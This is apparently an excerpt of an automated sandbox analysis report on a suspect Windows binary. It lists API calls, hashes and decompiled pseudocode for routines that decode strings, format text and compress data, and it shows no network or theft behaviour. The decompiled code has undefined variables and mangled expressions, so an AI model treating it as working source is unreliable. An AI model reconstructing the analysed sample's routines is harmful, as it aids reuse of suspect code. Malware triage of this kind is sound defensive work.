                          • Opcode Fuzzy Hash: 806676a9ac2160821656b73c3c3d18db0ff4a4b5fcef53e859bad7cfc76f4798
                          • Instruction Fuzzy Hash: 3F129EB1604309ABD720DF24D885BBB77E6AF84344F14842CFA4A973A2EB71DD05CB56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 006F08C1
                            • Part of subcall function 006E3180: GetProcessHeap.KERNEL32(00000000,00000000,006F2549,?,00000000,00000001,00000000), ref: 006E3193
                            • Part of subcall function 006E3180: RtlReAllocateHeap.NTDLL(002B0000,00000008,?,?), ref: 006E31B0
                          • CryptStringToBinaryW.CRYPT32(?,00000000,00000007,00000000,?,00000000,00000000), ref: 006F08EC
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: BinaryCryptHeapString$AllocateProcess
                          • String ID:
                          • API String ID: 3825993179-0
                          • Opcode ID: 012e7b7b38fd28b29e0ee91931b0e86bef51c58611c71a8dda0cf1d8cf5c74ea
                          • Instruction ID: 7e1d610b48c9337360da2d614251c46e7df5fcc8d75be8e3a3381241c21472c3
                          • Opcode Fuzzy Hash: 012e7b7b38fd28b29e0ee91931b0e86bef51c58611c71a8dda0cf1d8cf5c74ea
                          • Instruction Fuzzy Hash: E50192716042287BE2208B16DC44FABBEEEEF49B98F01402DF54897252D2A1DD00CAF1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E006F3430() {
                          				void* _t36;
                          				intOrPtr* _t37;
                          				void* _t38;
                          				WCHAR** _t48;
                          				WCHAR* _t50;
                          				WCHAR** _t51;
                          				WCHAR** _t55;
                          				signed int _t57;
                          				WCHAR** _t58;
                          				void* _t59;
                          				WCHAR** _t62;
                          				WCHAR* _t63;
                          				intOrPtr _t67;
                          				WCHAR** _t68;
                          				signed int _t70;
                          				void* _t71;
                          				void* _t73;
                          				WCHAR** _t75;
                          				WCHAR** _t76;
                          				WCHAR** _t78;
                          				intOrPtr* _t79;
                          				void* _t80;
                          				WCHAR*** _t81;
                          				WCHAR*** _t82;
                          
                          				_t67 =  *((intOrPtr*)(_t79 + 0x30));
                          				_t57 = 0;
                          				 *_t79 = 0;
                          				 *((intOrPtr*)(_t79 + 8)) = 0;
                          				if(_t67 != 0) {
                          					_t36 = E006EC380(_t67, 0, _t79 + 8,  *((intOrPtr*)(_t79 + 0x34)));
                          					_t80 = _t79 + 0x10;
                          					if(_t36 != 0) {
                          						_t37 = _t80 + 0xc;
                          						 *_t37 = 0x2f;
                          						_push(6);
                          						_push(_t80);
                          						_push(_t37);
                          						_push( *((intOrPtr*)(_t80 + 0x14)));
                          						_t38 = E006E9FF0();
                          						_t81 = _t80 + 0x10;
                          						_t57 = 0;
                          						_t73 = _t38;
                          						_t75 = 0;
                          						_t81[1] = 0;
                          						if(_t38 == 6) {
                          							_t58 = _t81[0x10];
                          							_t48 = E006E8C50(( *_t81)[4]);
                          							_t82 =  &(_t81[1]);
                          							_t76 = _t48;
                          							_t50 = E006E8C50(( *_t82)[3]);
                          							_t81 =  &(_t82[1]);
                          							 *_t58 = _t50;
                          							if(_t76 == 0) {
                          								_t57 = 0;
                          								_t81[1] = 0;
                          								goto L13;
                          							} else {
                          								_t51 =  *_t81;
                          								_t57 = 0;
                          								_t81[1] = _t76;
                          								_t63 = _t51[5];
                          								if(( *_t63 & 0x0000ffff) != 0xd) {
                          									L13:
                          									_t75 = 0;
                          								} else {
                          									_t57 = 0;
                          									if((_t63[1] & 0x0000ffff) != 0xa) {
                          										goto L13;
                          									} else {
                          										_t71 = _t67 + lstrlenW( *_t51) + 2;
                          										_t59 = 0xfffffff0;
                          										do {
                          											_t71 = _t71 + lstrlenW( *( *_t81 + _t59 + 0x14)) + 1;
                          											_t59 = _t59 + 4;
                          										} while (_t59 != 0);
                          										_t78 = _t81[1];
                          										_t57 = 0;
                          										if( *((char*)(_t71 +  &(_t78[0]))) != 0xd) {
                          											goto L13;
                          										} else {
                          											_t72 = _t71 + 2;
                          											_t57 = 0;
                          											if( *((char*)(_t71 + 2 +  &(_t78[0]))) != 0xa) {
                          												goto L13;
                          											} else {
                          												_t55 = E006E3180(_t78, 0);
                          												_t81 =  &(_t81[2]);
                          												if(_t55 == 0) {
                          													_t57 = 0;
                          													goto L13;
                          												} else {
                          													_t75 = _t55;
                          													E006EC400(_t55, _t72, _t78);
                          													_t81 =  &(_t81[3]);
                          													_t57 = 1;
                          												}
                          											}
                          										}
                          									}
                          								}
                          							}
                          						}
                          						_t39 = _t81[2];
                          						if(_t81[2] != 0) {
                          							E006E91E0(_t39);
                          							_t81 =  &(_t81[1]);
                          						}
                          						_t40 =  *_t81;
                          						_t68 = _t81[0xf];
                          						_t62 = _t81[0xe];
                          						if( *_t81 != 0) {
                          							if(_t73 != 0) {
                          								E006E91E0( *_t40);
                          								_t81 =  &(_t81[1]);
                          								if(_t73 != 1) {
                          									_t70 = 1;
                          									do {
                          										E006E91E0(( *_t81)[_t70]);
                          										_t81 =  &(_t81[1]);
                          										_t70 = _t70 + 1;
                          									} while (_t73 != _t70);
                          								}
                          								_t40 =  *_t81;
                          								_t68 = _t81[0xf];
                          							}
                          							E006E91E0(_t40);
                          							_t81 =  &(_t81[1]);
                          							_t62 = _t81[0xe];
                          						}
                          						 *_t62 = _t75;
                          						 *_t68 = _t81[1];
                          					}
                          				}
                          				return _t57;
                          			}

                          APIs
                            • Part of subcall function 006EC380: MultiByteToWideChar.KERNEL32(00000000,00000000,0000FDE9,00000000,00000000,00000000,00000000,00000000,?,00000010,006E8EF7,?,0000FDE9,00000010,000000FF,00000010), ref: 006EC396
                            • Part of subcall function 006EC380: MultiByteToWideChar.KERNEL32(?,00000000,0000FDE9,?,00000000,00000000), ref: 006EC3C4
                          • lstrlenW.KERNEL32(00000000), ref: 006F34EE
                          • lstrlenW.KERNEL32(?), ref: 006F350A
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: ByteCharMultiWidelstrlen
                          • String ID:
                          • API String ID: 3109718747-0
                          • Opcode ID: 99684c955a829836ccc2d6c8a3607726af3763c13850f76ca6f98eb2cac686ac
                          • Instruction ID: a648e14a4528a1a7ff921f7e02cce9eadf31a075e2f9aaf705cd3fb00a972104
                          • Opcode Fuzzy Hash: 99684c955a829836ccc2d6c8a3607726af3763c13850f76ca6f98eb2cac686ac
                          • Instruction Fuzzy Hash: 5B41E4B1608318AFD751AF69D885A7BB7E6EF84308F44443CFA4987352EA31EE14C752
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E006EF0E0() {
                          				short* _t72;
                          				short* _t73;
                          				signed char _t74;
                          				signed char* _t76;
                          				void* _t80;
                          				void* _t82;
                          				void* _t85;
                          				short** _t90;
                          				short* _t97;
                          				void* _t102;
                          				char* _t106;
                          				signed char _t108;
                          				signed char _t109;
                          				short** _t113;
                          				short** _t114;
                          				signed char _t116;
                          				unsigned int _t118;
                          				short** _t123;
                          				short** _t126;
                          				void* _t127;
                          				short** _t132;
                          				signed int _t133;
                          				void* _t136;
                          				short** _t138;
                          				short* _t141;
                          				signed int _t143;
                          				short** _t145;
                          				signed int _t146;
                          				signed int _t148;
                          				short** _t153;
                          				short** _t154;
                          				short*** _t155;
                          				char _t173;
                          				short** _t181;
                          
                          				_t113 = _t155[0x10f];
                          				_t148 = _t155[0x10e];
                          				 *_t155 =  &(_t155[0x111]);
                          				_t132 = _t113 + _t148;
                          				if(_t113 > 0) {
                          					_t153 = _t155[0x110];
                          					_t148 = _t155[0x10e];
                          					_t72 =  *_t153;
                          					if(_t72 != 0) {
                          						_t155[1] = _t132;
                          						_t133 = _t155[0x10e];
                          						_t155[7] =  ~_t133 - _t113;
                          						_t148 = _t133;
                          						_t132 = _t155[1];
                          						do {
                          							if(_t72 != 0x25) {
                          								 *_t148 = _t72;
                          								goto L10;
                          							} else {
                          								_t73 = _t153[0];
                          								_t114 =  &(_t153[0]);
                          								_t155[8] = 0;
                          								if(_t73 + 0xd0 > 9) {
                          									_t74 = 0x20;
                          								} else {
                          									_t154 =  &(_t153[0]);
                          									_t146 = 0;
                          									_t141 = _t73;
                          									do {
                          										_t146 = _t141 + (_t146 + _t146 * 4) * 2 - 0x30;
                          										_t141 =  *_t154;
                          										_t154 =  &(_t154[0]);
                          									} while (_t141 + 0xd0 < 0xa);
                          									do {
                          										_t143 = _t114[0];
                          										_t114 =  &(_t114[0]);
                          										_t102 = _t143 + 0xd0;
                          									} while (_t102 < 0xa);
                          									_t74 = (_t143 & 0xffffff00 | _t102 == 0x00000030) << 0x00000004 | 0x00000020;
                          								}
                          								_t132 = _t155[1];
                          								if(_t74 == 0x6c) {
                          									_t74 = _t114[0];
                          									_t114 =  &(_t114[0]);
                          								}
                          								_t153 = _t114;
                          								if(_t74 > 0x57) {
                          									_t155[2] = _t74;
                          									_t116 = _t74 + 0x90;
                          									if(_t116 > 8) {
                          										if(_t74 == 0x58) {
                          											_t75 =  *_t155;
                          											_t136 = 0;
                          											_t44 =  &(_t75[1]); // 0x24
                          											 *_t155 = _t44;
                          											_t118 =  *( *_t155);
                          											_t76 =  &(_t155[6]);
                          											_t155[6] = 0;
                          											while(_t118 != 0) {
                          												_t108 = _t118 & 0x0000000f;
                          												if(_t108 < 0xa) {
                          													_t109 = _t108 | 0x00000030;
                          												} else {
                          													_t109 = _t108 + 0x37;
                          												}
                          												_t136 = _t136 + 1;
                          												 *_t76 = _t109;
                          												_t76 = _t76 - 1;
                          												_t118 = _t118 >> 4;
                          												if(_t136 < 8) {
                          													continue;
                          												}
                          												goto L50;
                          											}
                          											goto L50;
                          										} else {
                          											if(_t74 == 0x64) {
                          												_t91 =  *_t155;
                          												_t106 =  &(_t155[8]);
                          												_t36 =  &(_t91[1]); // 0x24
                          												 *_t155 = _t36;
                          												_push(_t106);
                          												_push( *( *_t155));
                          												E006E5BE0();
                          												goto L36;
                          											}
                          										}
                          									} else {
                          										switch( *((intOrPtr*)((_t116 & 0x000000ff) * 4 +  &M006EF408))) {
                          											case 0:
                          												_t94 =  *_t155;
                          												_t139 = 0;
                          												_t31 =  &(_t94[1]); // 0x24
                          												 *_t155 = _t31;
                          												_t130 =  *( *_t155);
                          												_t95 =  &(_t155[6]);
                          												_t155[6] = 0;
                          												do {
                          													_t111 = _t130 & 0x0000000f;
                          													if(_t111 < 0xa) {
                          														_t112 = _t111 | 0x00000030;
                          													} else {
                          														_t112 = _t111 + 0x37;
                          													}
                          													_t139 = _t139 + 1;
                          													 *(_t95 - 1) = _t112;
                          													_t95 = _t95 - 1;
                          													_t130 = _t130 >> 4;
                          												} while (_t139 < 8);
                          												goto L51;
                          											case 1:
                          												goto L65;
                          											case 2:
                          												__eax =  *__esp;
                          												__ecx =  &(__eax[4]);
                          												 *__esp =  &(__eax[4]);
                          												if( *__eax != 0) {
                          													goto L53;
                          												} else {
                          												}
                          												goto L65;
                          											case 3:
                          												__eax =  *__esp;
                          												__ecx =  &(__eax[4]);
                          												 *__esp =  &(__eax[4]);
                          												__eax = E006E81C0( *__eax,  &(__esp[8]));
                          												L36:
                          												_t132 = _t155[3];
                          												_t155 =  &(_t155[2]);
                          												goto L53;
                          											case 4:
                          												__eax =  *__esp;
                          												__edx = 0;
                          												_t41 =  &(__eax[4]); // 0x4
                          												__ecx = _t41;
                          												 *__esp = _t41;
                          												__ecx =  *( *__esp);
                          												__eax =  &(__esp[6]);
                          												__esp[6] = 0;
                          												while(__ecx != 0) {
                          													if((__ecx & 0x0000000f) < 0xa) {
                          														__bl = __bl | 0x00000030;
                          													} else {
                          														__bl = __bl + 0x57;
                          													}
                          													__edx = __edx + 1;
                          													 *__eax = __bl;
                          													__eax = __eax - 1;
                          													__ecx = __ecx >> 4;
                          													if(__edx < 8) {
                          														continue;
                          													} else {
                          													}
                          													break;
                          												}
                          												L50:
                          												_t77 =  &(_t76[1]);
                          												L51:
                          												_t106 =  &(_t155[0xa]);
                          												E006EC400(_t106, _t77,  &(_t155[7]) - _t77);
                          												_t155 =  &(_t155[3]);
                          												goto L52;
                          										}
                          									}
                          									goto L65;
                          								} else {
                          									if(_t74 == 0x25) {
                          										 *_t148 = 0x25;
                          										L10:
                          										_t148 = _t148 + 1;
                          										goto L65;
                          									} else {
                          										if(_t74 != 0x53) {
                          											if(_t74 != 0) {
                          												goto L65;
                          											} else {
                          											}
                          										} else {
                          											_t155[2] = _t74;
                          											_t96 =  *_t155;
                          											_t106 =  &(_t155[8]);
                          											_t26 =  &(_t96[1]); // 0x24
                          											 *_t155 = _t26;
                          											_t97 =  *( *_t155);
                          											if(_t97 != 0) {
                          												_t106 =  &(_t155[0xb]);
                          												WideCharToMultiByte(0xfde9, 0, _t97, 0xffffffff, _t106, 0x400, 0, 0);
                          												L52:
                          												_t132 = _t155[1];
                          											}
                          											L53:
                          											_t80 = _t132 - _t148;
                          											if( *_t106 != 0) {
                          												_t127 = 0;
                          												do {
                          													_t173 = _t106[_t127 + 1];
                          													_t127 = _t127 + 1;
                          												} while (_t173 != 0);
                          											}
                          											_t138 =  <  ? 0 : _t80 - 1;
                          											_t82 = 0 - _t138;
                          											_t155[3] = _t138;
                          											if(_t82 > 0 && _t148 < _t155[1] && _t82 != 0) {
                          												_t85 = _t155[7] + _t148;
                          												_t123 = _t155[3];
                          												_t124 =  <  ? _t85 : _t123;
                          												_t125 =  ~( <  ? _t85 : _t123);
                          												E006F6610(_t148, _t155[2] & 0x000000ff,  ~( <  ? _t85 : _t123));
                          												_t126 = _t155[4];
                          												_t155 =  &(_t155[3]);
                          												_t90 =  &(_t155[3][0]);
                          												while(1) {
                          													_t148 = _t148 + 1;
                          													if(_t148 >= _t126) {
                          														goto L64;
                          													}
                          													_t181 = _t90;
                          													_t90 =  &(_t90[0]);
                          													if(_t181 != 0) {
                          														continue;
                          													}
                          													goto L64;
                          												}
                          											}
                          											L64:
                          											_t145 = _t155[3];
                          											E006EC400(_t148, _t106, _t145);
                          											_t132 = _t155[4];
                          											_t155 =  &(_t155[3]);
                          											_t148 = _t145 + _t148;
                          											L65:
                          											if(_t148 < _t132) {
                          												goto L66;
                          											}
                          										}
                          									}
                          								}
                          							}
                          							goto L67;
                          							L66:
                          							_t72 = _t153[0];
                          							_t153 =  &(_t153[0]);
                          						} while (_t72 != 0);
                          					}
                          				}
                          				L67:
                          				_t70 =  <  ? _t148 : _t132 - 1;
                          				 *((char*)( <  ? _t148 : _t132 - 1)) = 0;
                          				return _t148 - _t155[0x10e];
                          			}

                          APIs
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000400,00000000,00000000), ref: 006EF1F6
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide
                          • String ID:
                          • API String ID: 626452242-0
                          • Opcode ID: b5451e085c02ba5f254344ccd38fdff766910eb3b7a3213b8625b5691e50fe6a
                          • Instruction ID: 749775d80b44f305177475300421f846eec091dea9fb769cbb311c3a5837ec42
                          • Opcode Fuzzy Hash: b5451e085c02ba5f254344ccd38fdff766910eb3b7a3213b8625b5691e50fe6a
                          • Instruction Fuzzy Hash: 21A1E73420A3858FDB19CF19C8946EAB7E3EF85304F08856DE4D687345E6309D4BCB96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E006F35E0() {
                          				signed int _t144;
                          				signed int _t147;
                          				signed int _t157;
                          				signed int _t158;
                          				signed int _t162;
                          				signed int _t165;
                          				signed char _t170;
                          				signed char _t172;
                          				void* _t181;
                          				signed char _t186;
                          				signed int _t187;
                          				signed char _t198;
                          				signed char _t205;
                          				signed char _t221;
                          				signed int _t224;
                          				void* _t225;
                          				void* _t226;
                          				signed int _t227;
                          				signed int _t229;
                          				signed char _t231;
                          				signed int _t236;
                          				signed char _t237;
                          				signed int _t238;
                          				signed int _t245;
                          				signed int _t251;
                          				signed char _t252;
                          				signed char _t257;
                          				signed char _t262;
                          				signed int _t266;
                          				signed int _t273;
                          				signed int _t274;
                          				signed int _t275;
                          				signed int _t276;
                          				signed char _t278;
                          				signed int _t279;
                          				signed int _t280;
                          				signed int _t281;
                          				unsigned int _t282;
                          				signed int _t283;
                          				signed int _t284;
                          				signed int _t285;
                          				signed int _t286;
                          				signed char _t290;
                          				signed int _t291;
                          				signed int _t301;
                          				signed int _t302;
                          				signed char _t303;
                          				signed int _t305;
                          				signed char _t306;
                          				signed int _t311;
                          				signed int* _t313;
                          				signed char _t316;
                          				signed char _t317;
                          				signed char _t318;
                          				signed int _t319;
                          				signed char _t320;
                          				signed int _t324;
                          				signed int _t326;
                          				signed char* _t327;
                          				signed char _t328;
                          				signed int _t330;
                          				signed char _t331;
                          				signed char* _t335;
                          				signed char _t336;
                          				signed int* _t338;
                          				void* _t342;
                          
                          				_t319 = _t338[0xd];
                          				_t306 = _t338[0xe];
                          				_t144 = _t338[0xf];
                          				_t224 = _t338[0xc];
                          				_t231 = _t306;
                          				_t266 = _t319;
                          				if(_t319 >= 0xe) {
                          					_t302 = _t224 + 4;
                          					_t237 = _t306;
                          					_t338[3] = _t224;
                          					_t338[6] = _t224 + _t319 - 0xd;
                          					_t338[5] = _t224 + _t319;
                          					do {
                          						_t227 = _t338[0x10];
                          						_t303 = _t302 + 4;
                          						_t338[1] = _t237;
                          						do {
                          							_t238 =  *(_t303 - 1) & 0x000000ff;
                          							_t157 =  *(_t303 - 2) & 0x000000ff;
                          							_t35 = _t303 - 4; // -8
                          							_t273 = _t35;
                          							 *_t338 = _t273;
                          							_t338[2] = _t238;
                          							_t338[4] = _t157;
                          							_t245 = (( *(_t303 - 4) & 0x000000ff ^ ( *(_t303 - 3) & 0x000000ff ^ (_t238 << 0x00000006 ^ _t157) << 0x00000005) << 0x00000005) << 5) + ( *(_t303 - 4) & 0x000000ff ^ ( *(_t303 - 3) & 0x000000ff ^ (_t238 << 0x00000006 ^ _t157) << 0x00000005) << 0x00000005) >> 5;
                          							_t324 = _t245 & 0x00003fff;
                          							_t158 =  *(_t227 + _t324 * 4);
                          							if(_t158 >= _t338[0xc]) {
                          								_t274 = _t273 - _t158;
                          								_t41 = _t274 - 1; // -9
                          								__eflags = _t41 - 0xbffe;
                          								if(_t41 <= 0xbffe) {
                          									__eflags = _t274 - 0x801;
                          									_t229 = _t274;
                          									if(_t274 >= 0x801) {
                          										_t275 = _t338[2];
                          										_t311 = _t338[0x10];
                          										__eflags =  *((intOrPtr*)(_t158 + 3)) - _t275;
                          										if( *((intOrPtr*)(_t158 + 3)) != _t275) {
                          											_t324 = _t245 & 0x000007ff ^ 0x0000201f;
                          											_t158 =  *(_t311 + _t324 * 4);
                          											__eflags = _t158 - _t338[0xc];
                          											if(_t158 < _t338[0xc]) {
                          												goto L23;
                          											} else {
                          												_t229 =  *_t338 - _t158;
                          												_t53 = _t229 - 1; // -9
                          												__eflags = _t53 - 0xbffe;
                          												if(_t53 <= 0xbffe) {
                          													__eflags = _t229 - 0x801;
                          													if(_t229 < 0x801) {
                          														goto L18;
                          													} else {
                          														__eflags =  *((intOrPtr*)(_t158 + 3)) - _t275;
                          														if( *((intOrPtr*)(_t158 + 3)) == _t275) {
                          															goto L18;
                          														} else {
                          															goto L23;
                          														}
                          													}
                          												} else {
                          													goto L23;
                          												}
                          											}
                          										} else {
                          											goto L18;
                          										}
                          									} else {
                          										_t311 = _t338[0x10];
                          										L18:
                          										__eflags = ( *_t158 & 0x0000ffff) -  *(_t303 - 4);
                          										if(( *_t158 & 0x0000ffff) !=  *(_t303 - 4)) {
                          											goto L23;
                          										} else {
                          											__eflags =  *((intOrPtr*)(_t158 + 2)) - _t338[4];
                          											if( *((intOrPtr*)(_t158 + 2)) != _t338[4]) {
                          												goto L23;
                          											} else {
                          												_t338[4] = _t158;
                          												_t162 =  *_t338;
                          												_t251 = _t338[3];
                          												_t338[2] = _t229;
                          												 *(_t311 + _t324 * 4) = _t162;
                          												_t278 = _t162 - _t251;
                          												__eflags = _t278;
                          												if(_t278 <= 0) {
                          													 *_t338 = _t251;
                          													_t252 = _t338[1];
                          													_t224 = _t338[0xc];
                          												} else {
                          													_t262 = _t338[1];
                          													_t224 = _t338[0xc];
                          													__eflags = _t278 - 3;
                          													_t317 = _t278;
                          													if(_t278 > 3) {
                          														__eflags = _t278 - 0x12;
                          														if(_t278 > 0x12) {
                          															_t290 = _t278 - 0x12;
                          															_t335 = _t262 + 1;
                          															 *_t262 = 0;
                          															__eflags = _t290 - 0x100;
                          															if(_t290 >= 0x100) {
                          																E006F6610(_t335, 0, ((0xfffffeee - _t338[3] + _t162) * 0x80808081 >> 0x20 >> 7) + 1);
                          																_t338 =  &(_t338[3]);
                          																_t290 = (( *_t338 - 0x112 - _t338[3]) * 0x80808081 >> 0x20 >> 7) - (0x80808081 << 8) +  *_t338 - 0x111 - _t338[3];
                          																__eflags = _t290;
                          																_t221 =  &(_t335[0xffffffff80808081]);
                          																_t335 = _t338[1] + 0xffffffff80808083;
                          																_t262 = _t221;
                          															}
                          															_t262 = _t262 + 2;
                          															__eflags = _t262;
                          															 *_t335 = _t290;
                          														} else {
                          															 *_t262 = _t278 + 0xfd;
                          															_t262 = _t262 + 1;
                          														}
                          													} else {
                          														 *(_t262 - 2) =  *(_t262 - 2) | _t278;
                          													}
                          													_t291 = _t338[3];
                          													_t205 = 0;
                          													__eflags = 0;
                          													_t336 = _t317;
                          													do {
                          														_t318 = _t262;
                          														 *((char*)(_t318 + _t205)) =  *((intOrPtr*)(_t291 + _t205));
                          														_t205 = _t205 + 1;
                          														_t262 = _t318;
                          														__eflags = _t336 - _t205;
                          													} while (_t336 != _t205);
                          													_t252 = _t262 + _t336;
                          													__eflags = _t252;
                          												}
                          												_t279 = _t338[4];
                          												__eflags =  *((intOrPtr*)(_t279 + 3)) -  *(_t303 - 1);
                          												if( *((intOrPtr*)(_t279 + 3)) !=  *(_t303 - 1)) {
                          													L57:
                          													_t302 = _t303 - 1;
                          													_t280 = _t338[2];
                          													_t306 = _t338[0xe];
                          													_t165 = _t302 -  *_t338;
                          													__eflags = _t280 - 0x800;
                          													if(_t280 > 0x800) {
                          														__eflags = _t280 - 0x4000;
                          														if(_t280 > 0x4000) {
                          															_t281 = _t280 + 0xffffc000;
                          															_t327 = _t252;
                          															_t257 =  &(_t327[1]);
                          															__eflags = _t257;
                          															 *_t327 = _t165 + 0x000000fe | _t281 >> 0x0000000b & 0x00000008 | 0x00000010;
                          														} else {
                          															_t281 = _t280 - 1;
                          															_t172 = _t165 + 0x000000fe | 0x00000020;
                          															__eflags = _t172;
                          															goto L61;
                          														}
                          														goto L63;
                          													} else {
                          														_t283 = _t280 - 1;
                          														_t328 = _t252;
                          														_t282 = _t283 >> 3;
                          														_t257 = _t328;
                          														 *_t328 = (_t165 << 5) + 0xe0 + (_t283 & 0x00000007) * 4;
                          													}
                          												} else {
                          													__eflags =  *((intOrPtr*)(_t279 + 4)) -  *_t303;
                          													if( *((intOrPtr*)(_t279 + 4)) !=  *_t303) {
                          														_t303 = _t303 + 1;
                          														goto L57;
                          													} else {
                          														__eflags =  *((intOrPtr*)(_t279 + 5)) -  *(_t303 + 1);
                          														if( *((intOrPtr*)(_t279 + 5)) !=  *(_t303 + 1)) {
                          															_t303 = _t303 + 2;
                          															goto L57;
                          														} else {
                          															__eflags =  *((intOrPtr*)(_t279 + 6)) -  *(_t303 + 2);
                          															if( *((intOrPtr*)(_t279 + 6)) !=  *(_t303 + 2)) {
                          																_t303 = _t303 + 3;
                          																goto L57;
                          															} else {
                          																__eflags =  *((intOrPtr*)(_t279 + 7)) -  *(_t303 + 3);
                          																if( *((intOrPtr*)(_t279 + 7)) !=  *(_t303 + 3)) {
                          																	_t303 = _t303 + 4;
                          																	__eflags = _t303;
                          																	goto L57;
                          																} else {
                          																	__eflags =  *((intOrPtr*)(_t279 + 8)) -  *(_t303 + 4);
                          																	_t303 = _t303 + 5;
                          																	if(__eflags != 0) {
                          																		goto L57;
                          																	} else {
                          																		_t284 = _t338[5];
                          																		__eflags = _t303 - _t284;
                          																		if(_t303 < _t284) {
                          																			_t316 = _t338[4] + 9;
                          																			__eflags = _t316;
                          																			while(1) {
                          																				__eflags =  *_t316 -  *_t303;
                          																				if( *_t316 !=  *_t303) {
                          																					goto L50;
                          																				}
                          																				_t303 = _t303 + 1;
                          																				_t316 = _t316 + 1;
                          																				__eflags = _t303 - _t284;
                          																				if(_t303 < _t284) {
                          																					continue;
                          																				}
                          																				goto L50;
                          																			}
                          																		}
                          																		L50:
                          																		_t285 = _t338[2];
                          																		_t181 = _t303 -  *_t338;
                          																		__eflags = _t285 - 0x4000;
                          																		if(_t285 > 0x4000) {
                          																			_t306 = _t338[0xe];
                          																			_t281 = _t285 + 0xffffc000;
                          																			__eflags = _t181 - 9;
                          																			if(_t181 > 9) {
                          																				_t338[2] = _t281;
                          																				_t286 = _t181 + 0xfffffff7;
                          																				_t186 = _t281 >> 0x0000000b & 0x00000008 | 0x00000010;
                          																				__eflags = _t186;
                          																				goto L6;
                          																			} else {
                          																				_t172 = _t181 + 0x000000fe | _t281 >> 0x0000000b & 0x00000008 | 0x00000010;
                          																				L61:
                          																				 *_t252 = _t172;
                          																				_t257 = _t252 + 1;
                          																			}
                          																		} else {
                          																			_t306 = _t338[0xe];
                          																			__eflags = _t181 - 0x21;
                          																			_t338[2] = _t285 - 1;
                          																			if(_t181 > 0x21) {
                          																				_t286 = _t181 + 0xffffffdf;
                          																				_t186 = 0x20;
                          																				L6:
                          																				 *_t252 = _t186;
                          																				_t313 = _t252 + 1;
                          																				__eflags = _t286 - 0x100;
                          																				_t187 = _t286;
                          																				if(_t286 >= 0x100) {
                          																					 *_t338 = _t187;
                          																					_t330 = ( *_t338 - 0x100) * 0x80808081 >> 0x20 >> 7;
                          																					_t20 = _t330 + 1; // 0x80808082
                          																					_t338[4] = _t252;
                          																					E006F6610(_t313, 0, _t20);
                          																					_t338 =  &(_t338[3]);
                          																					_t331 = _t330 - (_t330 << 8);
                          																					__eflags = _t331;
                          																					 *_t338 =  *_t338 + _t331 - 0xff;
                          																					_t198 = _t313 + _t330;
                          																					_t313 = _t338[1] + _t330 + 2;
                          																					_t252 = _t198;
                          																					_t187 =  *_t338;
                          																				}
                          																				 *_t313 = _t187;
                          																				_t306 = _t338[0xe];
                          																				_t257 = _t252 + 2;
                          																				__eflags = _t257;
                          																				goto L9;
                          																			} else {
                          																				 *_t252 = _t181 + 0x000000fe | 0x00000020;
                          																				_t257 = _t252 + 1;
                          																				L9:
                          																				_t281 = _t338[2];
                          																				goto L63;
                          																			}
                          																			goto L64;
                          																		}
                          																		L63:
                          																		_t282 = _t281 >> 6;
                          																		_t170 = _t281 << 2;
                          																		__eflags = _t170;
                          																		 *_t257 = _t170;
                          																	}
                          																}
                          															}
                          														}
                          													}
                          												}
                          												goto L64;
                          											}
                          										}
                          									}
                          								} else {
                          									_t311 = _t338[0x10];
                          									goto L23;
                          								}
                          							} else {
                          								_t311 = _t227;
                          								goto L23;
                          							}
                          							L67:
                          							_t266 = _t276 - _t305;
                          							 *_t326 = _t231 - _t306;
                          							_t144 = _t326;
                          							_t319 = _t338[0xd];
                          							goto L68;
                          							L23:
                          							_t54 = _t303 + 1; // -3
                          							_t227 = _t311;
                          							_t342 = _t303 + 0xfffffffd - _t338[6];
                          							_t303 = _t54;
                          							 *(_t311 + _t324 * 4) =  *_t338;
                          						} while (_t342 < 0);
                          						_t305 = _t338[3];
                          						_t326 = _t338[0xf];
                          						_t306 = _t338[0xe];
                          						_t276 = _t338[5];
                          						_t231 = _t338[1];
                          						_t224 = _t338[0xc];
                          						goto L67;
                          						L64:
                          						 *(_t257 + 1) = _t282;
                          						_t237 = _t257 + 2;
                          						__eflags = _t302 - _t338[6];
                          						_t326 = _t338[0xf];
                          						_t276 = _t338[5];
                          						_t338[3] = _t302;
                          					} while (_t302 < _t338[6]);
                          					goto L67;
                          				}
                          				L68:
                          				if(_t266 != 0) {
                          					_t301 = _t266;
                          					if(_t231 != _t306 || _t266 > 0xee) {
                          						__eflags = _t266 - 3;
                          						if(_t266 > 3) {
                          							__eflags = _t266 - 0x12;
                          							if(_t266 > 0x12) {
                          								_t225 = _t266 - 0x12;
                          								 *_t231 = 0;
                          								__eflags = _t225 - 0x100;
                          								if(_t225 >= 0x100) {
                          									_t338[1] = _t231;
                          									__eflags = 0x80808081;
